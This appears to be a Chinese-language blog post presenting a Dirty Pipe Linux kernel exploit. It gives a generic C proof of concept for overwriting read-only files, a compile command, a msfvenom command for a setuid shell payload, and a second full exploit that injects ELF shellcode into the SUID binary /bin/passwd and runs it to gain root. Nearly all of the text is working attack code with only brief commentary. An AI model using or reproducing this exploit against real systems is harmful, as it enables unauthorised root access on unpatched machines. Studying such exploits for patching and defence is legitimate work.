#define _GNU_SOURCE #include <fcntl.h> #include <stdlib.h> #include <stdio.h> #include <unistd.h> #include <strings.h> #include <sys/stat.h> #include <sys/user.h> void errExit(char *buf) { printf("[x] ERROR: %s", buf); exit(EXIT_FAILURE); } int main(int argc, char **argv, char **envp) { size_t page_size; size_t offset_infile; int target_filefd; struct stat target_filestat; size_t data_length; int pipe_fd[2]; int pipe_size; char *buffer; int retval; if (argc < 4) { puts("[*] Usage: ./exp target_file offset_in_file data"); exit(EXIT_FAILURE); } page_size = sysconf(_SC_PAGESIZE); offset_infile = strtoul(argv[2], NULL, 0); if (offset_infile % page_size == 0) { errExit("Can't write on a whole page"); } target_filefd = open(argv[1], O_WRONLY); if (target_filefd < 0) { errExit("Open error"); } if (fstat(target_filefd, &target_filestat) < 0) { errExit("fstat error"); } data_length = strlen(argv[3]); if (offset_infile + data_length > target_filestat.st_size) { errExit("Can't enlarge file"); } if ((offset_infile % page_size + data_length) > page_size) { errExit("Can't write across pages"); } puts("[*] Start exploiting.."); puts("[*] Setting all pipe_buffer to PIPE_BUF_FLAG_CAN_MERGE"); pipe(pipe_fd); pipe_size = fcntl(pipe_fd[1], F_GETPIPE_SZ); buffer = (char *)malloc(pipe_size); for (int size_left = pipe_size; size_left > 0;) { int pre_write = size_left > page_size ? page_size : size_left; size_left -= write(pipe_fd[1],buffer,pre_write); } for (int size_left = pipe_size; size_left > 0;) { int pre_write = size_left > page_size ? page_size : size_left; size_left -= read(pipe_fd[0],buffer,pre_write); } puts("[*] flags setting success"); puts("[*] read one bytes from the file by splice"); offset_infile--; retval=splice(target_filefd,&offset_infile,pipe_fd[1],NULL,1,0); if(retval<0) { errExit("Splice error"); } else if (retval==0) { errExit("Splice is small"); } puts("[*] splice done"); retval=write(pipe_fd[1],argv[3],data_length); if(retval<0) { errExit("write error"); } else if(retval<data_length) { errExit("write too short"); } puts("[*] done"); }

编译命令

bash
gcc poc.c -o poc -static -masm=intel -g

提权

这里可以选用跟脏牛类似的提权思路 可以新建Root用户提权或者SUID提权 这里选择SUID提权

使用MSF生成payload

bash
msfvenom -p linux/x64/exec PrependSetuid=True -f elf | xxd -i

EXP如下

c
#define _GNU_SOURCE #include <fcntl.h> #include <stdlib.h> #include <stdio.h> #include <unistd.h> #include <strings.h> #include <sys/stat.h> #include <sys/user.h> void errExit(char *buf) { printf("[x] ERROR: %s", buf); exit(EXIT_FAILURE); } unsigned char shellcode[]={0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x5e, 0x6a, 0x3b, 0x58, 0x0f, 0x05}; int main(int argc, char **argv, char **envp) { size_t page_size; size_t offset_infile; int target_filefd; struct stat target_filestat; size_t data_length; int pipe_fd[2]; int pipe_size; char *buffer; int retval; page_size = sysconf(_SC_PAGESIZE); offset_infile = 1; if (offset_infile % page_size == 0) { errExit("Can't write on a whole page"); } target_filefd = open("/bin/passwd", O_RDONLY); if (target_filefd < 0) { errExit("Open error"); } if (fstat(target_filefd, &target_filestat) < 0) { errExit("fstat error"); } data_length = strlen(shellcode); if (offset_infile + data_length > target_filestat.st_size) { errExit("Can't enlarge file"); } if ((offset_infile % page_size + data_length) > page_size) { errExit("Can't write across pages"); } puts("[*] Start exploiting.."); puts("[*] Setting all pipe_buffer to PIPE_BUF_FLAG_CAN_MERGE"); pipe(pipe_fd); pipe_size = fcntl(pipe_fd[1], F_GETPIPE_SZ); buffer = (char *)malloc(pipe_size); for (int size_left = pipe_size; size_left > 0;) { int pre_write = size_left > page_size ? page_size : size_left; size_left -= write(pipe_fd[1],buffer,pre_write); } for (int size_left = pipe_size; size_left > 0;) { int pre_write = size_left > page_size ? page_size : size_left; size_left -= read(pipe_fd[0],buffer,pre_write); } puts("[*] flags setting success"); puts("[*] read one bytes from the file by splice"); offset_infile--; retval=splice(target_filefd,&offset_infile,pipe_fd[1],NULL,1,0); if(retval<0) { errExit("Splice error"); } else if (retval==0) { errExit("Splice is small"); } puts("[*] splice done"); retval=write(pipe_fd[1],shellcode,data_length); if(retval<0) { errExit("write error"); } else if(retval<data_length) { errExit("write too short"); } system("/bin/passwd"); puts("[*] done"); }

本文作者:Du4t

本文链接:

版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!